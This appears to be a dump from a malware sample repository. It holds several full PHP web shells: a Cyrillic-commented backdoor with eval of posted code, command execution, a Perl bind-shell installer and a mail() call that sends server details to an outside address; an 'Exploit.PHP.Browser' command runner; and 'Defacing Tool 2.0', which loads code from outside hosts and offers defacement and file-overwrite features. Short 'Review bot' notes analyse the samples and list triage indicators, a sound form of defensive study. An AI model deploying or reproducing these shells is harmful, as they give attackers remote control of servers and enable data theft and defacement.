return convert_cyr_string ($buffer, 'd', 'w');
}
function execute($com)
{
if (!empty($com))
{
if(function_exists('exec'))
{
exec($com,$arr);
echo implode('
',$arr);
}
elseif(function_exists('shell_exec'))
{
echo shell_exec($com);
}
elseif(function_exists('system'))
{
echo system($com);
}
elseif(function_exists('passthru'))
{
echo passthru($com);
}
}
}
function perms($mode)
{
if( $mode & 0x1000 ) { $type='p'; }
else if( $mode & 0x2000 ) { $type='c'; }
else if( $mode & 0x4000 ) { $type='d'; }
else if( $mode & 0x6000 ) { $type='b'; }
else if( $mode & 0x8000 ) { $type='-'; }
else if( $mode & 0xA000 ) { $type='l'; }
else if( $mode & 0xC000 ) { $type='s'; }
else $type='u';
$owner["read"] = ($mode & 00400) ? 'r' : '-';
$owner["write"] = ($mode & 00200) ? 'w' : '-';
$owner["execute"] = ($mode & 00100) ? 'x' : '-';
$group["read"] = ($mode & 00040) ? 'r' : '-';
$group["write"] = ($mode & 00020) ? 'w' : '-';
$group["execute"] = ($mode & 00010) ? 'x' : '-';
$world["read"] = ($mode & 00004) ? 'r' : '-';
$world["write"] = ($mode & 00002) ? 'w' : '-';
$world["execute"] = ($mode & 00001) ? 'x' : '-';
if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
$s=sprintf("%1s", $type);
$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
return trim($s);
}
/*Íà÷èíàåòñÿ*/
/*Îïðåäåëÿåì òèï ñèñòåìû*/
$servsoft = $_SERVER['SERVER_SOFTWARE'];
if (ereg("Win32", $servsoft, $reg)){
$sertype = "winda";
}
else
{
$sertype = "other";}
echo $servsoft . "<br>";
chdir($dir);
echo "Total space " . (int)(disk_total_space(getcwd())/(1024*1024)) . "Mb " . "Free space " . (int)(disk_free_space(getcwd())/(1024*1024)) . "Mb <br>";$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
if (ini_get('safe_mode') <> 1){
if ($sertype == "winda"){
ob_start('decode');
echo "OS: ";
echo execute("ver") . "<br>";
ob_end_flush();
}
if ($sertype == "other"){
echo "id:";
echo execute("id") . "<br>";
echo "uname:" . execute('uname -a') . "<br>";
}}
else{
if ($sertype == "winda"){
echo "OS: " . php_uname() . "<br>";
}
if ($sertype == "other"){
echo "id:";
echo execute("id") . "<br>";
echo "OS:" . php_uname() . "<br>";
}
}
echo 'User: ' .get_current_user() . '<br>';
if (ini_get("open_basedir")){
echo "open_basedir: " . ini_get("open_basedir");}
if (ini_get('safe_mode') == 1){
echo "<font size=\"3\"color=\"#cc0000\">Safe mode :(";
if (ini_get('safe_mode_include_dir')){
echo "Including from here: " . ini_get('safe_mode_include_dir'); }
if (ini_get('safe_mode_exec_dir')){
echo " Exec here: " . ini_get('safe_mode_exec_dir');
}
echo "</font>";}
if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["userfile"][name] !== "")
{
copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]["name"]);
}
if((isset($_POST['fileto']))||(isset($_POST['filefrom'])))
{
$data = implode("", file($_POST['filefrom']));
$fp = fopen($_POST['fileto'], "wb");
fputs($fp, $data);
$ok = fclose($fp);
if($ok)
{
$size = filesize($_POST['fileto'])/1024;
$sizef = sprintf("%.2f", $size);
print "<center><div id=logostrip>Download - OK. (".$sizef."êÁ)</div></center>";
}
else
{
print "<center><div id=logostrip>Something is wrong. Download - IS NOT OK</div></center>";
}
}
if (isset($_POST['installbind'])){
if (is_dir($_POST['installpath']) == true){
chdir($_POST['installpath']);
$_POST['installpath'] = "temp.pl";}
$fp = fopen($_POST['installpath'], "w");
fwrite($fp, $bind);
fclose($fp);
exec("perl " . $_POST['installpath']);
chdir($dir);
}
@$ef = stripslashes($_POST['editfile']);
if ($ef){
$fp = fopen($ef, "r");
$filearr = file($ef);
$string = '';
$content = '';
foreach ($filearr as $string){
$string = str_replace("<" , "&lt;" , $string);
$string = str_replace(">" , "&gt;" , $string);
$content = $content . $string;
}
echo "<center><div id=logostrip>Edit file: $ef </div><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=content cols=100 rows=20>$content</textarea>
<input type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
<input type=\"hidden\" name=\"savefile\" value=\"{$_POST['editfile']}\"><br>
<input type=\"submit\" name=\"submit\" value=\"Save\" id=input></form></center>";
fclose($fp);
}
if(isset($_POST['savefile'])){
$fp = fopen($_POST['savefile'], "w");
$content = stripslashes($content);
fwrite($fp, $content);
fclose($fp);
echo "<center><div id=logostrip>Successfully saved!</div></center>";
}
if (isset($_POST['php'])){
echo "<center><div id=logostrip>PHP code<br><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=phpcode cols=100 rows=20></textarea><br>
<input type=\"submit\" name=\"submit\" value=\"Exec\" id=input></form></center></div>";
}
if(isset($_POST['phpcode'])){
echo "<center><div id=logostrip>Results of PHP execution<br><br>";
@eval(stripslashes($_POST['phpcode']));
echo "</div></center>";
}
if ($cmd){
if($sertype == "winda"){
ob_start();
execute($cmd);
$buffer = "";
$buffer = ob_get_contents();
ob_end_clean();
}
else{
ob_start();
echo decode(execute($cmd));
$buffer = "";
$buffer = ob_get_contents();
ob_end_clean();
}
if (trim($buffer)){
echo "<center><div id=logostrip>Command: $cmd<br><textarea cols=100 rows=20>";
echo decode($buffer);
echo "</textarea></center></div>";
}
}
$arr = array();
$arr = array_merge($arr, glob("*"));
$arr = array_merge($arr, glob(".*"));
$arr = array_merge($arr, glob("*.*"));
$arr = array_unique($arr);
sort($arr);
echo "<table><tr><td>Name</td><td><a title=\"Type of object\">Type</a></td><td>Size</td><td>Last access</td><td>Last change</td><td>Perms</td><td><a title=\"If Yes, you have write permission\">Write</a></td><td><a title=\"If Yes, you have read permission\">Read</a></td></tr>";
foreach ($arr as $filename) {
if ($filename != "." and $filename != ".."){
if (is_dir($filename) == true){
$directory = "";
$directory = $directory . "<tr><td>$filename</td><td>" . filetype($filename) . "</td><td></td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
if (is_writable($filename) == true){
$directory = $directory . "<td>Yes</td>";}
else{
$directory = $directory . "<td>No</td>";
}
if (is_readable($filename) == true){
$directory = $directory . "<td>Yes</td>";}
else{
$directory = $directory . "<td>No</td>";
}
$dires = $dires . $directory;
}
if (is_file($filename) == true){
$file = "";
$file = $file . "<tr><td><a onclick=tag('$filename')>$filename</a></td><td>" . filetype($filename) . "</td><td>" . filesize($filename) . "</td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
if (is_writable($filename) == true){
$file = $file . "<td>Yes</td>";}
else{
$file = $file . "<td>No</td>";
}
if (is_readable($filename) == true){
$file = $file . "<td>Yes</td></td></tr>";}
else{
$file = $file . "<td>No</td></td></tr>";
}
$files = $files . $file;
}
}
}
echo $dires;
echo $files;
echo "</table><br>";
echo "
<form action=\"$REQUEST_URI\" method=\"POST\">
<table id=tb><tr><td>Command:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\"></td></tr></table>
<table id=tb><tr><td>Directory:<INPUT type=\"text\" name=\"dir\" size=30 value=\"";
echo getcwd();
echo "\">
<INPUT type=\"submit\" value=\"Do it\" id=input></td></tr></table></form>";
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
<table id=tb><tr><td>Download here <b>from</b>:
<INPUT type=\"text\" name=\"filefrom\" size=30 value=\"http://\">
<b>into:</b>
<INPUT type=\"text\" name=\"fileto\" size=30>
<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\"></td><td>
<INPUT type=\"submit\" value=\"Download\" id=input></td></tr></table></form></div>";
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
<table id=tb><tr><td>
Download from Hard:<INPUT type=\"file\" name=\"userfile\" id=input2>
<INPUT type=\"hidden\" name=\"post\" value=\"yes\">
<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
</td><td><INPUT type=\"submit\" value=\"Download\" id=input></form></div></td></tr></table>";
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
<table id=tb><tr><td>Install bind
<b>Temp path</b><input type=\"text\" name=\"installpath\" value=\"" . getcwd() . "\"></td><td>
<b>Port</b><input type=\"text\" name=\"port\" value=\"3333\" maxlength=5 size=4></td><td>
<INPUT type=\"hidden\" name=\"installbind\" value=\"yes\">
<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
<INPUT type=\"submit\" value=\"Install\" id=input></form></div></td></table>";
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" name=fe>
<table id=tb><tr><td>File to edit:
<input type=\"text\" name=\"editfile\" ></td><td>
<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
<INPUT type=\"submit\" value=\"Edit\" id=input></form></div></td></table>";
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
<table id=tb><tr><td>
<INPUT type=\"hidden\" name=\"php\" value=\"yes\">
<INPUT type=\"submit\" value=\"PHP code\" id=input></form></div></td></table>";
?>
</td></tr></table>
</td></tr>
<tr valign="BOTTOM">
<td valign=bottom>
<center>Coded by Loader <a href="http://pro-hack.ru">Pro-Hack.RU</a></center>
</td>
</tr>
</table>
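Review bot: The header comment is the only description this file has and it is unreadable: the text looks like Windows-1251 Cyrillic decoded as Latin-1, so the feature list an analyst would want is lost. Rather than touching the sample's bytes, I would record the intended encoding in the corpus metadata and keep a short English summary next to the sample listing what the visible code does: `eval()` of the POST field `phpcode`, command execution from the POST field `cmd`, a fetch from `filefrom` written to `fileto`, and a Perl listener written to `temp.pl` when `installpath` is a directory. For host triage, that listener sets its process name to `updatedb` padded with spaces, so a perl-started process under that name holding a listening socket under the web server's account is worth checking.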

File diff suppressed because one or more lines are too long


@ -0,0 +1,84 @@
<html>
<head><title>EXPLOIT.PHP.BROWSER</title></head>
<body><h1>EXPLOIT.PHP.BROWSER</h1>
<?
// Exploit.PHP.Browser By Psychologic
// Take ur own risk if you do stupid things
// with this.
if (isset($dir_kerja)) {
chdir($dir_kerja); //change to working directory
$dir_kerja = exec("pwd"); //execute the pwd(daemon)
} else {
chdir($DOCUMENT_ROOT); //Get the root directory
$dir_kerja = $DOCUMENT_ROOT;
}
if (trim($dir_baru) <> "") {
chdir($dir_baru);
$dir_kerja = exec("pwd");
}
?>
<form name="myform" action="<? echo $PHP_SELF ?>" method="post">
<p>Active directory : <b>
<?
$split_dir_kerja = explode("/", substr($dir_kerja, 1));
echo "<a href=\"$PHP_SELF?dir_kerja=" . urlencode($url) . "/&command=" . urlencode($command) . "\">Root</a>/";
if ($split_dir_kerja[0] == "") {
$dir_kerja = "/";
} else {
for ($i = 0; $i < count($split_dir_kerja); $i++) {
$url .= "/" . $split_dir_kerja[$i];
echo "<a href=\"$PHP_SELF?dir_kerja=" . urlencode($url) . "&command=" . urlencode($command) . "\">$split_dir_kerja[$i]</a>/";
}
}
// See you can look at many virtual host
?>
</b></p>
<p>Choose your new work directory</p>
<select name="dir_kerja" onChange="this.form.submit()">
<?
$dir_handle = opendir($dir_kerja);
while ($dir = readdir($dir_handle)) {
if (is_dir($dir)) {
if ($dir == ".") {
echo "<option value=\"$dir_kerja\" selected>Choose Directory</option>\n";
} elseif ($dir == "..") {
if (strlen($dir_kerja) == 1) {
} elseif (strrpos($dir_kerja, "/") == 0) {
echo "<option value=\"/\">Main Directory</option>\n";
} else {
echo "<option value=\"". strrev(substr(strstr(strrev($dir_kerja), "/"), 1)) ."\"> Main Directory </option>\n";
}
} else {
if ($dir_kerja == "/") {
echo "<option value=\"$dir_kerja$dir\">$dir</option>\n";
} else {
echo "<option value=\"$dir_kerja/$dir\">$dir</option>\n";
}
}
}
}
closedir($dir_handle);
?>
</select>
<input type="text" name="dir_baru" size="60" value="">
<p>Perintah :</p>
<input type="text" name="command" size="60" <? if ($command) { echo "value=\"$command\"";} ?> >
<p><input name="submit_btn" type="submit" value="Execute command"></p>
<p>Perapian <code>stderr</code> diperlukan?
<input type="checkbox" name="stderr"></p>
<p>Hasil Eksekusi :</p>
<textarea cols="80" rows="20" readonly>
<?
if ($command) {
if ($stderr) {
system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/output.txt");
} else {
system($command);
}
}
?>
</textarea>
</form>
</body>
</html>
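Review bot: Nothing in this file tells an analyst that it only works where request parameters are injected as globals: `$command`, `$dir_kerja`, `$dir_baru`, `$stderr`, `$DOCUMENT_ROOT` and `$PHP_SELF` are read as plain variables and never taken from a superglobal, which presumably means register_globals is required. I would add a header comment saying so, for example `// sample: unauthenticated command shell; relies on register_globals; form fields command, dir_kerja, dir_baru, stderr`. When the `stderr` box is ticked the command output is written to `/tmp/output.txt` and then removed, so that fixed path is a usable file-system indicator.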

214
PHP/Backdoor.PHP.WebShell.f Normal file

@ -0,0 +1,214 @@
<!--
Defacing Tool 2.0 by r3v3ng4ns
revengans@gmail.com
se for modificar o codigo, por favor, mantenha o nome de seus autores originais
e por favor, mantenha a cmd priv8. se vc recebeu o codigo ou url, confiei(amos) em vc...
-->
<?php
@closelog();
@error_reporting(0);
$vers="2.0beta priv8!";
$remote_addr="http://dezu.webshells.org/";
$format_addr=".dat";
$cmd_addr=$remote_addr."tool20".$format_addr;
$safe_addr=$remote_addr."safe20".$format_addr;
$writer_addr=$remote_addr."writer20".$format_addr;
$phpget_addr=$remote_addr."get20".$format_addr;
$feditor_addr=$remote_addr."filed".$format_addr;
$put_addr=$remote_addr."filed_put".$format_addr;
$total_addr="http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
if(empty($chdir)) $chdir = @$_GET['chdir'];
if(empty($cmd)) $cmd = @$_GET['cmd'];
if(empty($fu)) $fu = @$_GET['fu'];
if(empty($list)) $list = @$_GET['list'];
if(empty($chdir) or $chdir=='') $chdir=getcwd();
$cmd = stripslashes(trim($cmd));
//CHDIR tool
if (strpos($cmd, 'chdir')!==false and strpos($cmd, 'chdir')=='0'){
$boom = explode(" ",$cmd,2);
$boom2 = explode(";",$boom['1'], 2);
$toDir = $boom2['0'];
if($boom['1']=="/")$chdir="";
else if(strpos($cmd, 'chdir ..')!==false){
$cadaDir = array_reverse(explode("/",$chdir));
if($cadaDir['0']=="" or $cadaDir['0'] ==" ") $lastDir = $cadaDir['1']."/";
else{ $lastDir = $cadaDir['0']."/"; $chdir = $chdir."/";}
$toDir = str_replace($lastDir,"",$chdir);
if($toDir=="/")$chdir="";
}
else if(strpos($cmd, 'chdir .')===0) $toDir = getcwd();
else if(strpos($cmd, 'chdir ~')===0) $toDir = getcwd();
if(strrpos($toDir,"/")==(strlen($toDir)-1)) $toDir=substr($toDir,0,strrpos($toDir,"/"));
if(@opendir($toDir)!==false or @is_dir($toDir)) $chdir=$toDir;
else if(@opendir($chdir."/".$toDir)!==false or @is_dir($chdir."/".$toDir)) $chdir=$chdir."/".$toDir;
else $ch_msg="dtool: line 1: chdir: $toDir: No such directory.\n";
if($boom2['1']==null) $cmd = trim($boom['2']); else $cmd = trim($boom2['1'].$boom2['2']);
if(strpos($chdir, '//')!==false) $chdir = str_replace('//', '/', $chdir);
}
if(!@opendir($chdir)) $ch_msg="dtool: line 1: chdir: It seems that the permission have been denied in dir '$chdir'. Anyway, you can try to send a command here now. If you haven't accessed it, try to use 'cd' in the cmd line instead.\n";
$cmdShow = $cmd;
//To keep the changes in the url, when using the 'GET' way to send php variables
if(empty($post)){
if($chdir==getcwd() or empty($chdir) or $chdir=="")$showdir="";else $showdir="+'chdir=$chdir&'";
if($fu=="" or $fu=="0" or empty($fu))$showfu="";else $showfu="+'fu=$fu&'";
if($list=="" or $list=="0" or empty($list)){$showfl="";$fl="on";}else{$showfl="+'list=1&'"; $fl="off";}
}
//INFO table (pro and normal)
if (@file_exists("/usr/X11R6/bin/xterm")) $pro1="<i>xterm</i> at /usr/X11R6/bin/xterm, ";
if (@file_exists("/usr/bin/nc")) $pro2="<i>nc</i> at /usr/bin/nc, ";
if (@file_exists("/usr/bin/wget")) $pro3="<i>wget</i> at /usr/bin/wget, ";
if (@file_exists("/usr/bin/lynx")) $pro4="<i>lynx</i> at /usr/bin/lynx, ";
if (@file_exists("/usr/bin/gcc")) $pro5="<i>gcc</i> at /usr/bin/gcc, ";
if (@file_exists("/usr/bin/cc")) $pro6="<i>cc</i> at /usr/bin/cc ";
$safe = @ini_get($safemode);
if ($safe) $pro8="<b><i>safe_mode</i>: YES</b>, "; else $pro7="<b><i>safe_mode</i>: NO</b>, ";
$pro8 = "<i>PHP </i>".phpversion();
$pro=$pro1.$pro2.$pro3.$pro4.$pro5.$pro6.$pro7.$pro8;
$login=@posix_getuid(); $euid=@posix_geteuid(); $gid=@posix_getgid();
$ip=@gethostbyname($_SERVER['HTTP_HOST']);
//Turns the 'ls' command more usefull, showing it as it looks in the shell
if(strpos($cmd, 'ls --') !==false) $cmd = str_replace('ls --', 'ls -F --', $cmd);
else if(strpos($cmd, 'ls -') !==false) $cmd = str_replace('ls -', 'ls -F', $cmd);
else if(strpos($cmd, ';ls') !==false) $cmd = str_replace(';ls', ';ls -F', $cmd);
else if(strpos($cmd, '; ls') !==false) $cmd = str_replace('; ls', ';ls -F', $cmd);
else if($cmd=='ls') $cmd = "ls -F";
//If there are some '//' in the cmd, its now removed
if(strpos($chdir, '//')!==false) $chdir = str_replace('//', '/', $chdir);
?>
<body onload="focar();">
<style>.campo{font-family: Verdana; color:white;font-size:11px;background-color:#414978;height:23px}
.infop{font-family: verdana; font-size: 10px; color:#000000;}
.infod{font-family: verdana; font-size: 10px; color:#414978;}
.algod{font-family: verdana; font-size: 12px; font-weight: bold; color: #414978;}
.titulod{font:Verdana; color:#414978; font-size:20px;}</style>
<script>
function inclVar(){var addr = location.href.substring(0,location.href.indexOf('?')+1);var stri = location.href.substring(addr.length,location.href.length+1);inclvar = stri.substring(0,stri.indexOf('='));}
function enviaCMD(){inclVar();window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfu.$showfl;?>+'cmd='+window.document.formulario.cmd.value;return false;}
function ativaFe(qual){inclVar();window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfl;?>+'fu='+qual+'&cmd='+window.document.formulario.cmd.value;return false;}
function PHPget(){inclVar(); if(confirm("O PHPget agora oferece uma lista pronta de urls,\nvc soh precisa escolher qual arquivo enviar para o servidor.\nDeseja utilizar isso? \nClique em Cancel para usar o PHPget normal, ou \nem Ok para usar esse novo recurso."))goPreGet(); else{var c=prompt("[ PHPget ] by r3v3ng4ns\nDigite a ORIGEM do arquivo (url) com ate 7Mb\n-Utilize caminho completo\n-Se for remoto, use http:// ou ftp://:","http://hostinganime.com/tool/nc.dat");var dir = c.substring(0,c.lastIndexOf('/')+1);var file = c.substring(dir.length,c.length+1);var p=prompt("[ PHPget ] by r3v3ng4ns\nDigite o DESTINO do arquivo\n-Utilize caminho completo\n-O diretorio de destino deve ser writable","<?=$chdir;?>/"+file);window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$phpget_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'c='+c+'&p='+p);}}
function goPreGet(){inclVar();window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$phpget_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'pre=1');}
function PHPwriter(){inclVar();var url=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite a URL do frame","http://hostinganime.com/tool/reven.htm");var dir = url.substring(0,url.lastIndexOf('/')+1);var file = url.substring(dir.length,url.length+1);var f=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite o Nome do arquivo a ser criado\n-Utilize caminho completo\n-O diretorio de destino deve ser writable","<?=$chdir;?>/"+file); t=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite o Title da pagina","[ r00ted team ] owned you :P - by r3v3ng4ns");window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$writer_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'url='+url+'&f='+f+'&t='+t);}
function PHPf(){inclVar();var o=prompt("[ PHPfilEditor ] by r3v3ng4ns\nDigite o nome do arquivo que deseja abrir\n-Utilize caminho completo\n-Abrir arquivos remotos, use http:// ou ftp://","<?=$chdir;?>/index.php"); var dir = o.substring(0,o.lastIndexOf('/')+1);var file = o.substring(dir.length,o.length+1);window.open('<?=$total_addr;?>?'+inclvar+'=<?=$feditor_addr;?>?&inclvar='+inclvar+'&o='+o);}
function safeMode(){inclVar();if (confirm ('Deseja ativar o DTool com suporte a SafeMode?')){window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$safe_addr;?>'+'?&'<?=$showdir;?>;}else{ return false }}
function list(turn){inclVar();if(turn=="off")turn=0;else if(turn=="on")turn=1; window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfu;?>+'list='+turn+'&cmd='+window.document.formulario.cmd.value;return false;}
function overwrite(){inclVar();if(confirm("O script tentara substituir todos os arquivos (do diretorio atual) que\nteem no nome a palavra chave especificada. Os arquivos serao\nsubstituidos pelo novo arquivo, especificado por voce.\n\nLembre-se!\n-Se for para substituir arquivos com a extensao jpg, utilize\ncomo palavra chave .jpg (inclusive o ponto!)\n-Utilize caminho completo para o novo arquivo, e se for remoto,\nutilize http:// e ftp://")){keyw=prompt("Digite a palavra chave",".jpg");newf=prompt("Digite a origem do arquivo que substituira","http://www.colegioparthenon.com.br/ingles/bins/revenmail.jpg");if(confirm("Se ocorrer um erro e o arquivo nao puder ser substituido, deseja\nque o script apague os arquivos e crie-os novamente com o novo conteudo?\nLembre-se de que para criar novos arquivos, o diretorio deve ser writable.")){trydel=1}else{trydel=0} if(confirm("Deseja substituir todos os arquivos do diretorio\n<?=$chdir;?> que contenham a palavra\n"+keyw+" no nome pelo novo arquivo de origem\n"+newf+" ?\nIsso pode levar um tempo, dependendo da quantidade de\narquivos e do tamanho do arquivo de origem.")){window.location.href='<?=$total_addr;?>?'+inclvar+'=<?=$cmd_addr;?>?&chdir=<?=$chdir;?>&list=1&'<?=$showfu?>+'&keyw='+keyw+'&newf='+newf+'&trydel='+trydel;return false;}}}
</script>
<table width="760" border="0" align="center" cellpadding="2" cellspacing="0" bgcolor="#FFFFFF">
<tr><td><div align="center" class="titulod"><b>[ Defacing Tool Pro v<?=$vers;?> ] <a href="mailto:revengans@gmail.com">?</a></font><br>
<font size=3>by r3v3ng4ns - revengans@gmail.com </font>
</b></div></td></tr>
<tr><td><TABLE width="370" BORDER="0" align="center" CELLPADDING="0" CELLSPACING="0">
<?php
$uname = @posix_uname();
while (list($info, $value) = each ($uname)) { ?>
<TR><TD><DIV class="infop"><b><?=$info ?>:</b> <?=$value;?></DIV></TD></TR><?php } ?>
<TR><TD><DIV class="infop"><b>user:</b> uid(<?=$login;?>) euid(<?=$euid;?>) gid(<?=$gid;?>)</DIV></TD></TR>
<TR><TD><DIV class="infod"><b>write permission:</b><? if(@is_writable($chdir)){ echo " <b>YES</b>"; }else{ echo " no"; } ?></DIV></TD></TR>
<TR><TD><DIV class="infop"><b>server info: </b><?="$SERVER_SOFTWARE $SERVER_VERSION";?></DIV></TD></TR>
<TR><TD><DIV class="infop"><b>pro info: ip </b><?="$ip, $pro";?></DIV></TD></TR>
<? if($chdir!=getcwd()){?>
<TR><TD><DIV class="infop"><b>original path: </b><?=getcwd() ?></DIV></TD></TR><? } ?>
<TR><TD><DIV class="infod"><b>current path: </b><?=$chdir ?>
</DIV></TD></TR></TABLE></td></tr>
<tr><td><form name="formulario" id="formulario" method="post" action="#" onSubmit="return enviaCMD()">
<table width="375" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#414978"><tr><td><table width="370" border="0" align="center" cellpadding="1" cellspacing="1" bgcolor="white"><tr>
<td width="75"><DIV class="algod">command</DIV></td>
<td width="300"><input name="cmd" type="text" id="cmd" value='<?=$cmdShow;?>' style="width:295; font-size:12px" class="campo">
<script>
function focar(){window.document.formulario.cmd.focus();window.document.formulario.cmd.select();}
</script>
</td></tr></table><table><tr><td>
<?php
ob_start();
if(isset($chdir)) @chdir($chdir);
function safemode($what){echo "This server is in safemode. Try to use DTool in Safemode.";}
function nofunction($what){echo "The admin disabled all the functions to send a cmd to the system.";}
function shell($what){echo(shell_exec($what));}
function popenn($what){
$handle=popen("$what", "r");
$out=@fread($handle, 2096);
echo $out;
@pclose($handle);
}
function execc($what){
exec("$what",$array_out);
$out=implode("\n",$array_out);
echo $out;
}
function procc($what){
//na sequencia: stdin, stdout, sterr
if($descpec = array(0 => array("pipe", "r"),1 => array("pipe", "w"),2 => array("pipe", "w"),)){
$process = @proc_open("$what",$descpec,$pipes);
if (is_resource($process)) {
fwrite($pipes[0], "");
fclose($pipes[0]);
while(!feof($pipes[2])) {
$erro_retorno = fgets($pipes[2], 4096);
if(!empty($erro_retorno)) echo $erro_retorno;//isso mostra tds os erros
}
fclose($pipes[2]);
while(!feof($pipes[1])) {
echo fgets($pipes[1], 4096);
}
fclose($pipes[1]);
$ok_p_fecha = @proc_close($process);
}else echo "It seems that this PHP version (".phpversion().") doesn't support proc_open() function";
}else echo "This PHP version ($pro7) doesn't have the proc_open() or this function is disabled by php.ini";
}
$funE="function_exists";
if($safe){$fe="safemode";$feshow=$fe;}
elseif($funE('shell_exec')){$fe="shell";$feshow="shell_exec";}
elseif($funE('passthru')){$fe="passthru";$feshow=$fe;}
elseif($funE('system')){$fe="system";$feshow=$fe;}
elseif($funE('exec')){$fe="execc";$feshow="exec";}
elseif($funE('popen')){$fe="popenn";$feshow="popen";}
elseif($funE('proc_open')){$fe="procc";$feshow="proc_open";}
else {$fe="nofunction";$feshow=$fe;}
if($fu!="0" or !empty($fu)){
if($fu==1){$fe="passthru";$feshow=$fe;}
if($fu==2){$fe="system";$feshow=$fe;}
if($fu==3){$fe="execc";$feshow="exec";}
if($fu==4){$fe="popenn";$feshow="popen";}
if($fu==5){$fe="shell";$feshow="shell_exec";}
if($fu==6){$fe="procc";$feshow="proc_open";}
}
$fe("$cmd 2>&1");
$output=ob_get_contents();ob_end_clean();
?>
<td><input type="button" name="snd" value="send cmd" class="campo" style="background-color:#313654" onClick="enviaCMD()"><select name="qualF" id="qualF" class="campo" style="background-color:#313654" onchange="ativaFe(this.value);">
<option><?="using $feshow()";?>
<option value="1">use passthru()
<option value="2">use system()
<option value="3">use exec()
<option value="4">use popen()
<option value="5">use shell_exec()
<option value="6">use proc_open()*new
<option value="0">auto detect (default)
</select><input type="button" name="getBtn" value="PHPget" class="campo" onClick="PHPget()"><input type="button" name="writerBtn" value="PHPwriter" class="campo" onClick="PHPwriter()"><br><input type="button" name="edBtn" value="fileditor" class="campo" onClick="PHPf()"><input type="button" name="listBtn" value="list files <?=$fl;?>" class="campo" onClick="list('<?=$fl;?>')"><? if ($list==1){ ?><input type="button" name="sbstBtn" value="overwrite files" class="campo" onClick="overwrite()"><input type="button" name="MkDirBtn" value="mkdir" class="campo" onClick="mkDirF()"><input type="button" name="ChModBtn" value="chmod" class="campo" onClick="chmod()"><br>
<? } ?><input type="button" name="smBtn" value="safemode" class="campo" onClick="safeMode()">
</tr></table></td></tr></table></form></td></tr>
<tr><td align="center"><DIV class="algod"><br>stdOut from <?="\"<i>$cmdShow</i>\", using <i>$feshow()</i>";?></i></DIV>
<TEXTAREA name="output_text" COLS="90" ROWS="10" STYLE="font-family:Courier; font-size: 12px; color:#FFFFFF; font-size:11 px; background-color:black;width:683;">
<?php
echo $ch_msg;
if (empty($cmd) and $ch_msg=="") echo ("Comandos Exclusivos do DTool Pro\n\nchdir <diretorio>; outros; cmds;\nMuda o diretorio para aquele especificado e permanece nele. Eh como se fosse o 'cd' numa shell, mas precisa ser o primeiro da linha. Os arquivos listados pelo filelist sao o do diretorio especificado ex: chdir /diretorio/sub/;pwd;ls\n\nPHPget, PHPwriter, Fileditor, File List e Overwrite\nfale com o r3v3ng4ns :P");
if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
?></TEXTAREA><BR></td></tr>
<?php
if($list=="1") @include($remote_addr."flist".$format_addr);
?>
</table

366
PHP/Backdoor.PHP.WebShell.k Normal file

@ -0,0 +1,366 @@
<!--
Defacing Tool Pro v1.7 comentado by r3v3ng4ns
Autor: r3v3ng4ns - revengans@hotmail.com
Modifique, copie e distribua mas, por favor, mantenha o nome dos autores originais
